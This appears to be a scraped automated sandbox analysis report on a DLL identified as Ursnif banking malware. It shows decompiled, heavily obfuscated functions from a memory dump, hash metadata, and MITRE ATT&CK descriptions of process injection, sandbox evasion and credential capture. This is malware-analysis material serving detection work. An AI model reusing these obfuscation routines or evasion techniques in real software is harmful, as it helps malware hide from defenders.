0x03332b6a
0x03332b6c
0x03332b6d
0x03332b6f
0x00000000
0x00000000
0x03332bb4
0x03332bb6
0x03332bf2
0x03332bf5
0x00000000
0x03332bfb
0x03332bfb
0x03332c05
0x03332c11
0x03332c1d
0x03332c35
0x03332c35
0x03332c3c
0x03332c3c
0x03332bb8
0x03332bb8
0x03332bc4
0x03332be8
0x03332be8
0x03332bef
0x03332bef
0x00000000
0x03332bb6
0x03332b71
0x03332b78
0x03332b9c
0x03332ba4
0x03332baa
0x03332bb1
0x03332a99
0x03332a9f
0x03332aaf
0x03332ac6
0x03332ac6
0x00000000

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction ID: 3d5c508f33e7303d7c31036ffa77958126b749a65afca6db72abfb6820c8fd11
Opcode Fuzzy Hash: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction Fuzzy Hash: CF51BD73D04504EFEB04DF69DD8279EBBB1FF80320F1AC5A9C895A7284CA746A10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0333150C, Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0333150C(signed int __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t88;
				signed int _t95;
				void* _t97;
				signed int _t100;
				signed int _t101;
				void* _t106;
				signed int _t107;
				signed int _t112;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				signed int _t124;
				signed int _t126;
				void* _t130;

				_t106 = __ebx;
				if(_t130 != _v12) {
					_t88 = __eax & 0x00000001;
					_t112 = _t112 & 0xffffffff;
				} else {
					_t88 = __eax ^ 0x1f4;
				}
				_a12 = _a12 - _t112;
				_a4 = _a4 & _t88;
				_a12 = 0xffffffff;
				_v12 = _v12 | _t107;
				_v12 = _v12 - 0xffffffff;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_v8 = _v8 - 1;
				_t115 = _t112 + 1 - 1 + 1;
				_v8 = _v8 | _t107 - 0x00000001;
				_t90 = _t88 - 0x51d + 0xffffffff;
				_a4 = _a4 ^ _t115;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) & _t126;
				_v12 = _v12 - _t88 - 0x51d + 0xffffffff;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_t95 = E03334A23(((_t90 | _a12) + 0x00000001 & 0x00000000) -  *(_t106 + 0x41d23c), _t106,  *((intOrPtr*)(_t106 + 0x41ce29)), ((_t90 | _a12) + 0x00000001 & 0x00000000) -  *(_t106 + 0x41d23c), _t126);
				_a4 = 0x458;
				 *(_t106 + 0x41d23c) = _t95;
				_a8 = _a8 ^ _t95;
				_t124 = _t115;
				 *(_t106 + 0x41d23c) = 0;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) ^ 0x00000001;
				 *(_t106 + 0x41d23c) = 0x13a;
				_a8 = _a8 - 0x31f;
				 *(_t106 + 0x41d23c) = _t126;
				_a8 = _a8 + 1;
				_t116 = _t115 - 1;
				_t97 = E03334A23(_t95 - 0x730, _t106, _t116,  *((intOrPtr*)(_t106 + 0x41c914)),  *((intOrPtr*)(_t106 + 0x41cea6)));
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) + _t97;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) ^ _t116;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - 1;
				_t100 = (_t97 + 0x00000001 ^ 0x00000000) + 0xffffffff;
				_v12 = _v12 & _t100;
				_t101 = _t100 ^ 0x00000000;
				_v12 = _t101;
				_v12 = _v12 + _t124;
				_v8 = _v8 - 1;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) + 1;
				_t118 = _t116 - _a8 - 0xffffffff;
				 *(_t106 + 0x41d23c) = _t118;
				 *(_t106 + 0x41d23c) =  *(_t106 + 0x41d23c) - (_t124 & 0x00000330);
				_v12 = _v12 & _t118;
				_a12 = _a12 | _t118;
				return (_t101 ^ 0x00000000) - 0x00000001 ^ 0x00000000;
			}

0x0333150c
0x0333151a
0x03331528
0x0333152d
0x0333151c
0x03331521
0x03331521
0x03331530
0x03331533
0x03331543
0x0333154b
0x03331552
0x03331559
0x03331562
0x03331565
0x0333156d
0x03331570
0x03331575
0x03331578
0x0333157e
0x03331581
0x033315aa
0x033315af
0x033315b6
0x033315bc
0x033315c1
0x033315c3
0x033315c9
0x033315d3
0x033315dd
0x033315e9
0x033315f6
0x033315f9
0x0333160c
0x03331611
0x0333161c
0x03331627
0x0333162d
0x03331639
0x0333163c
0x03331644
0x03331647
0x03331652
0x03331655
0x0333165c
0x03331668
0x0333166e
0x0333167f
0x03331682
0x03331690

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction ID: 7c8f37b350c32c0a651668556ca3545facbde672d49a0ba098bfa62d3596fd68
Opcode Fuzzy Hash: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction Fuzzy Hash: ED414A72C11604ABEB04CF76CA857CA7BB4EF44330F24C3A9AC399A1D5C3388651AF55

Uniqueness

Uniqueness Score: -1.00%

Function 03331967, Relevance: .1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03331967(signed int __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _t98;
				void* _t111;
				signed int _t116;
				void* _t117;
				signed int _t118;
				signed int _t119;
				void* _t121;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;

				_t117 = __ebx;
				_t98 = __eax;
				if(__ebx >= _a4) {
					_a4 = _a4 & _t128;
					_a4 = _a4 + 0xffffffff;
				} else {
					_t128 = (_t128 + 0xffffffff & 0x000006b0) + 1;
				}
				 *(_t117 + 0x41c345) =  *(_t117 + 0x41c345) ^ 0x000003e3;
				_t129 = _t128 & 0x00000000;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) ^ _t98;
				if( *(_t117 + 0x41c345) < 0x34d9) {
					_a4 = _a4 & 0xffffffff;
					_t98 = _t98 + 1;
				} else {
					 *(_t117 + 0x41c345) =  *(_t117 + 0x41c345) ^ _t129;
					 *(_t117 + 0x41c345) = 0x295;
					_v8 = _v8 + 1;
				}
				_t119 = _t118 &  *(_t117 + 0x41c345);
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) | _t129;
				_a4 = _a4 + _t129;
				_v8 = 0xffffffff;
				_t130 = _t129 + _v8;
				_a4 = _a4 | 0xfffff88b;
				_v8 = _v8 - 1;
				_v8 = _v8 + 1;
				_v8 = _v8 + 1;
				_v8 = _v8 | _t130;
				 *(_t117 + 0x41c598) = _t121 - _t119;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) & 0xffffffff;
				_v8 = _t119;
				_a4 = _a4 ^ 0x0000033f;
				_a4 = _a4 ^ _t119;
				_a4 = _a4 & _t126;
				_a4 = 0xfffffbb6;
				_v8 = _v8 | _t119;
				_v8 = _v8 - 1;
				 *(_t117 + 0x41c598) =  *(_t117 + 0x41c598) | _t126;
				_a4 = _a4 + 0xffffffff;
				_a4 = _a4 - 1;
				_a4 = _a4 - 1;
				_a4 = _a4 ^ 0x00000001;
				_a4 = _a4 & _t130;
				_t111 = E03331693((((_t98 - 0x00000001 + 0xffffffff - 0x0000031a ^ 0x2b0) + 0x00000409 ^ 0 | 0xffffffff) + 0xfffff86b ^ 0x00000000) + 1, _t117,  *((intOrPtr*)(_t117 + 0x41c6d0)),  *((intOrPtr*)(_t117 + 0x41c3f5)));
				 *(_t117 + 0x41c598) = 0x6a4;
				_t116 = (_t111 - 0x00000001 + 0x0000030f ^ 0xfffffffffffffffe) & 0x00000001;
				_a4 = _t116;
				_a4 = _a4 - 1;
				_v8 = _v8 - 0xffffffff;
				return _t116;
			}

0x03331967
0x03331967
0x03331975
0x03331985
0x03331988
0x03331977
0x03331980
0x03331980
0x0333198c
0x03331996
0x03331999
0x033319a9
0x033319c0
0x033319c4
0x033319ab
0x033319ab
0x033319b1
0x033319bb
0x033319bb
0x033319c5
0x033319cb
0x033319d1
0x033319d9
0x033319e0
0x033319f4
0x033319fb
0x033319fe
0x03331a03
0x03331a07
0x03331a0a
0x03331a16
0x03331a1d
0x03331a25
0x03331a3c
0x03331a4e
0x03331a54
0x03331a60
0x03331a6d
0x03331a70
0x03331a76
0x03331a7a
0x03331a84
0x03331a87
0x03331a8b
0x03331a9a
0x03331abc
0x03331af5
0x03331afa
0x03331b02
0x03331b05
0x03331b1b

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction ID: e213072ea640cab1fca95f3e0fff73c7589a1fccdd0b9d8c35c608f5f2babe8b
Opcode Fuzzy Hash: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction Fuzzy Hash: E5416D72C50618EBEB04CF68C9CA7CA3A70EF01330F28C399AC799D1D6C33956519A94

Uniqueness

Uniqueness Score: -1.00%

Function 033388BA, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E033388BA(void* __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				void* _t56;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				void* _t77;
				void* _t83;
				signed int _t84;
				void* _t89;
				void* _t96;
				signed int _t100;
				void* _t102;

				_t77 = __ebx;
				_t56 = __eax;
				if(_a4 > 0x9b86) {
					_t83 = _t83 - 1;
					_t89 = _t89 + 0xffffffff;
				}
				_t57 = _t56 + 0xffffffff;
				_t78 = 0xffffffff;
				if(_t83 > _a8) {
					 *(_t77 + 0x41c619) =  *(_t77 + 0x41c619) & 0xffffffff;
				} else {
					_t78 = 0;
					_t57 = _t57 ^ 0x00000000;
				}
				_t58 = _t57 & 0x00000001;
				_a12 = 1;
				_t84 = _t83 + 1;
				 *(_t77 + 0x41c619) =  *(_t77 + 0x41c619) | _t58;
				_t59 = _t58 ^ _t96 + 0xfffffa6c;
				if(_t102 < _t89) {
					 *(_t77 + 0x41c619) = 1;
					_t78 = _v12;
				} else {
					_a8 = _a8 + _t78;
					_t59 = _t59 ^ 0xffffffff;
				}
				_v12 = _v12 + 1;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 + 0xffffffff;
				_a12 = _a12 + 0xffffff46;
				_v8 = _v8 - 1;
				_v8 = _v8 + 0xfffffad4;
				_a4 = _a4 | _t84;
				_a12 = _a12 + 1;
				_t100 = _a12;
				_v8 = _v8 ^ _t100;
				_v12 = 0xfffffcfa;
				_v12 = _v12 ^ 0xffffffff;
				_a4 = _t100;
				_v8 = _v8 - 0xfffffe99;
				_v12 = _v12 & _t78;
				_a8 = _a8 + 1;
				_a8 = _a8 | 0x00000001;
				return 1;
			}

0x033388ba
0x033388ba
0x033388cc
0x033388ce
0x033388cf
0x033388cf
0x033388de
0x033388e3
0x033388eb
0x033388f5
0x033388ed
0x033388ed
0x033388ee
0x033388ee
0x033388fb
0x03338904
0x0333890b
0x0333890c
0x03338912
0x03338916
0x03338923
0x0333892d
0x03338918
0x03338918
0x0333891b
0x0333891b
0x03338930
0x03338933
0x03338941
0x03338948
0x03338954
0x0333895c
0x03338968
0x03338978
0x0333897b
0x03338984
0x0333898f
0x0333899a
0x033389aa
0x033389c0
0x033389c5
0x033389d0
0x033389da
0x033389f3

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction ID: bb74b885f0aa6e6a225aa263fb24a8888013df0c2aab8da4c06e8431cef765d0
Opcode Fuzzy Hash: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction Fuzzy Hash: 45315972920A09ABEB04CE78CD853DE7765FF81339F24C36AEC359A1D1D77886518B48

Uniqueness

Uniqueness Score: -1.00%

Function 033327D4, Relevance: .1, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E033327D4(signed int __eax, void* __ebx, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _t62;
				signed int _t64;
				signed int _t65;
				signed int _t76;
				void* _t78;
				signed int _t79;
				void* _t84;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t95;

				_t78 = __ebx;
				_t60 = __eax;
				if(_v8 >= 0x74b6) {
					_t60 = (__eax ^ _a4) + 1;
				} else {
					_t79 = _t79 + _t90;
				}
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - _t79;
				_t62 = E033392B2(_t60, _t78,  *((intOrPtr*)(_t78 + 0x41c5d8)),  *((intOrPtr*)(_t78 + 0x41d186)));
				_v8 = _v8 + 1;
				_t64 = _t62 + 1 - 0xffffffff;
				if(_a4 < 0xae5c) {
					_t95 =  *(_t78 + 0x41c908);
				} else {
					_t90 = _t90 ^ 0x00000000;
					_t64 = _t64 & 0x00000000;
				}
				_v8 = _v8 & 0xffffffff;
				_t91 = _t90 - 1;
				_t65 = _t64 + 0xfffffea2;
				_a4 = _a4 ^ _t91;
				_a8 = 1;
				if(_t79 <= _v8) {
					_t65 = _t65 - 1;
					_v8 = _v8 ^ 0x0000029c;
					_t79 = _t79 | _a8;
				} else {
					_v8 = _v8 - 1;
					_t95 = _t95 & _a4;
					_a4 = _a4 + 1;
				}
				_t92 = _t91 & 0xfffff9dc;
				_a4 = _a4 + _t92;
				_a4 = _a4 - 1;
				_v8 = _v8 & 0x00000000;
				_a8 = _a8 - 1;
				_a8 = _a8 & 0x00000001;
				_t76 = ((((_t65 ^ 0xfffff825) + 0x00000001 & 0) - 0x00000001 & 0xfffffaf6 ^ 0x00000000) & 0) + 0x566;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) | _t84 -  *(_t78 + 0x41c908) + 0xffffffff;
				_v8 = _v8 ^ 0x00000001;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - 1;
				_a8 = _a8 - 1;
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) & (_t95 - 0x00000001 ^ 0x00000000 ^ _t92 ^ 0x00000005 ^ _t76);
				 *(_t78 + 0x41c908) =  *(_t78 + 0x41c908) - _t92 + 1 - 0x7fa;
				return _t76 & 0x000005b0;
			}

0x033327d4
0x033327d4
0x033327e6
0x033327f3
0x033327e8
0x033327e8
0x033327e8
0x033327f8
0x0333280a
0x03332814
0x03332818
0x03332824
0x03332839
0x03332826
0x03332826
0x03332829
0x03332829
0x0333283f
0x03332843
0x03332844
0x03332849
0x0333284c
0x03332856
0x03332863
0x03332868
0x0333286f
0x03332858
0x03332858
0x0333285b
0x0333285e
0x0333285e
0x0333287d
0x033328a0
0x033328a3
0x033328a6
0x033328ad
0x033328bf
0x033328e3
0x033328ed
0x033328fd
0x0333290a
0x03332911
0x03332917
0x0333291d
0x03332929

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction ID: 98c357e64f10bc8b77c29b44efbe7842921f3af63e65cf5f12731b9feea8ddcb
Opcode Fuzzy Hash: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction Fuzzy Hash: D4315073920A08AFEB04CF38CD8679A7B74EF50335F29C365AC298E0D5D37996909A54

Uniqueness

Uniqueness Score: -1.00%

Function 033313C5, Relevance: .1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E033313C5(signed int __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _t69;
				void* _t71;
				signed int _t89;
				void* _t93;
				signed int _t94;
				intOrPtr _t98;
				signed int _t103;
				signed int _t108;
				signed int _t109;
				signed int _t111;

				_t93 = __ebx;
				_t69 = __eax;
				if(__eax == 0xa709) {
					_t94 = _t94 | 0xffffffff;
				} else {
					 *(__ebx + 0x41ca6d) =  *(__ebx + 0x41ca6d) & _t108;
				}
				_t109 = _t108 +  *((intOrPtr*)(_t93 + 0x41c507));
				_a8 = _a8 - _t109;
				_v12 = _v12 & _t109;
				_v12 = _v12 - 1;
				_t71 = E03339159(_t69 & 0x00000001, _t93,  *((intOrPtr*)(_t93 + 0x41d0c3)));
				 *((intOrPtr*)(_t93 + 0x41ca6d)) = 0x417;
				 *((intOrPtr*)(_t93 + 0x41c507)) = _t98;
				_a8 = _a8 ^ _t103;
				 *((intOrPtr*)(_t93 + 0x41c507)) =  *((intOrPtr*)(_t93 + 0x41c507)) - 0x2a9;
				_t111 = _v8;
				_v8 = ((_t71 + _a8 + _t103 ^ 0xffffffff) - _v12 - 0xfffffffffffffeb4 - _v8 - 0xffffffff + 0x00000001 ^ 0x000004b9) - 0x00000001 ^ 0;
				_a12 = _a12 ^ 0xffffffff;
				_a4 = _a4 + 0xffffffff;
				_v12 = _v12 | _t111;
				 *((intOrPtr*)(_t93 + 0x41ca6d)) =  *((intOrPtr*)(_t93 + 0x41ca6d)) + _t111;
				_v12 = _v12 | _t111;
				_t89 = E0333292C((((_t71 + _a8 + _t103 ^ 0xffffffff) - _v12 - 0xfffffffffffffeb4 - _v8 - 0xffffffff + 0x00000001 ^ 0x000004b9) - 0x00000001 ^ 0) - 1, _t93,  *((intOrPtr*)(_t93 + 0x41cf4b)),  *((intOrPtr*)(_t93 + 0x41ce86)), _t103 - 1 + 1);
				 *((intOrPtr*)(_t93 + 0x41ca6d)) = 0xffffffff;
				_v8 = _v8 - 0xffffffff;
				_v8 = _v8 - 1;
				_a8 = _a8 - 1;
				return (_t89 ^ 0xfffffffffffffe25) - 1;
			}

0x033313c5
0x033313c5
0x033313d5
0x033313df
0x033313d7
0x033313d7
0x033313d7
0x033313e5
0x033313f0
0x033313f3
0x033313f9
0x03331404
0x0333140f
0x0333141b
0x0333142a
0x03331452
0x0333147b
0x0333147e
0x0333148d
0x03331491
0x03331495
0x033314af
0x033314b9
0x033314ce
0x033314d3
0x033314ec
0x033314f8
0x033314fd
0x03331509

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction ID: c47b34e496de6a45cdd87ad31218f2e5166ea7e54506fb6be71de64268208393
Opcode Fuzzy Hash: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction Fuzzy Hash: FE31A972C10629ABEB04CE39CC8979A7B71EF40770F14C36AAC28D94D9C7749660DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 03332566, Relevance: .1, Instructions: 84
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03332566(signed int __eax, void* __ebx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t55;
				signed int _t60;
				signed int _t73;
				void* _t80;
				signed int _t81;
				void* _t93;

				_t80 = __ebx;
				_t55 = __eax;
				if(__ebx >= _t93) {
					_a4 = _a4 - 1;
				}
				_a4 = _a4 & 0x00000001;
				_v12 = _v12 - 1;
				_a4 = _a4 - 1;
				_t60 = ((_t55 ^ 0xffffffff) & 0) + 1;
				_v8 = _v8 + 0x40b;
				_v8 = _v8 ^ _t60;
				 *(_t80 + 0x41c9d8) =  *(_t80 + 0x41c9d8) ^ 0xffffffff;
				_v12 = _v12 & 0x00000000;
				 *(_t80 + 0x41c003) = 1;
				_a4 = _a4 ^ ((_t60 - 0x00000001 + _t60 - 0x00000001 + 0x00000001 & 0x00000000) - 0xffffffff & 0xfffffbfb ^ 0xffffffff) + 0x574;
				_t73 = E03337338((((_t60 - 0x00000001 + _t60 - 0x00000001 + 0x00000001 & 0x00000000) - 0xffffffff & 0xfffffbfb ^ 0xffffffff) + 0x574 & 0x00000001) - 0xfffffffffffffeed, _t80,  *((intOrPtr*)(_t80 + 0x41cdce)));
				_a4 = _a4 | _t73;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) ^ (_t81 | _a4) & _v12 ^ 0x00000000;
				_v8 = _v8 | 0xffffffe9;
				_v8 = 0xffffffff;
				 *(_t80 + 0x41c9d8) = _t73;
				 *(_t80 + 0x41c9d8) = 0xfffff81c;
				 *(_t80 + 0x41c9d8) = 0;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) & 0x00000440;
				_v12 = 0;
				_v12 = 0x3d2;
				 *(_t80 + 0x41c003) =  *(_t80 + 0x41c003) - _t81 + 0xffffffff;
				_v12 = _v12 + 1;
				return 2;
			}

0x03332566
0x03332566
0x03332573
0x03332575
0x03332578
0x03332583
0x03332587
0x0333258d
0x033325a2
0x033325b5
0x033325bc
0x033325bf
0x033325c6
0x033325e2
0x03332600
0x03332623
0x03332628
0x0333262b
0x03332637
0x0333263b
0x03332642
0x03332648
0x0333265e
0x03332669
0x03332675
0x03332678
0x03332680
0x03332692
0x033326a8

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction ID: 920e46a63939764747125accd46ff5e658d5e708b3c2b1e6e1e90c55f22169cc
Opcode Fuzzy Hash: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction Fuzzy Hash: E03183B3C106059BEB00CE78CD863CA7B70EF51374F298365AC38DE1D5D37986919A94

Uniqueness

Uniqueness Score: -1.00%

Function 033392B2, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E033392B2(signed int __eax, void* __ebx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t68;
				void* _t85;
				void* _t86;
				signed int _t91;
				void* _t92;
				signed int _t97;
				signed int _t98;
				void* _t101;

				_t85 = __ebx;
				_t101 = __eax - 0x2bdf;
				_t68 = E03331967(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41d155)));
				if(_t101 < 0) {
					_a8 = _a8 - 1;
				} else {
					_t91 = _t91 & 0x00000000;
					 *(__ebx + 0x41cd75) =  *(__ebx + 0x41cd75) ^ 0xfffffe87;
				}
				_t98 = _t97 ^ 0x000000ac;
				 *(_t85 + 0x41cd75) = _t98;
				_a8 = _a8 - 1;
				_v8 = _v8 ^ 0x00000001;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) ^ _t68;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + _t68 + 0xfffffe42;
				_a4 = _a4 & 0x000007d7;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + _t98 - 1;
				_v8 = _t86 + 1;
				_a8 = _a8 - 1;
				_v8 = _v8 ^ _t92 - 0xffffffff;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) & 0x00000000;
				 *(_t85 + 0x41cd75) = 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) - 1;
				_v8 = _v8 + 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) - 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) & 0xffffffff;
				_a8 = _a8 - _t91;
				_v8 = _v8 - 1;
				 *(_t85 + 0x41cd75) =  *(_t85 + 0x41cd75) + 0xffffffff;
				return (0xfffffffffffffdd8 ^ _t91) - 1;
			}

0x033392b2
0x033392bd
0x033392c8
0x033392cd
0x033392e1
0x033392cf
0x033392cf
0x033392d5
0x033392d5
0x033392e4
0x033392ea
0x033392f3
0x033392f6
0x033392fb
0x03339306
0x03339323
0x03339344
0x0333934a
0x0333934d
0x03339350
0x03339353
0x0333935a
0x03339375
0x03339385
0x0333938e
0x03339395
0x0333939d
0x033393ad
0x033393bd
0x033393c0
0x033393df

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction ID: 1e8a29b21a352a469240c8de70a10cbdcd508f853b23b707ff0aa5440e7a5a3b
Opcode Fuzzy Hash: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction Fuzzy Hash: 9B317E32890B04EBFB04CF38D9857DA7BB0EF41329F54827AEC199D1DAE37946109A55

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0204.gif.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

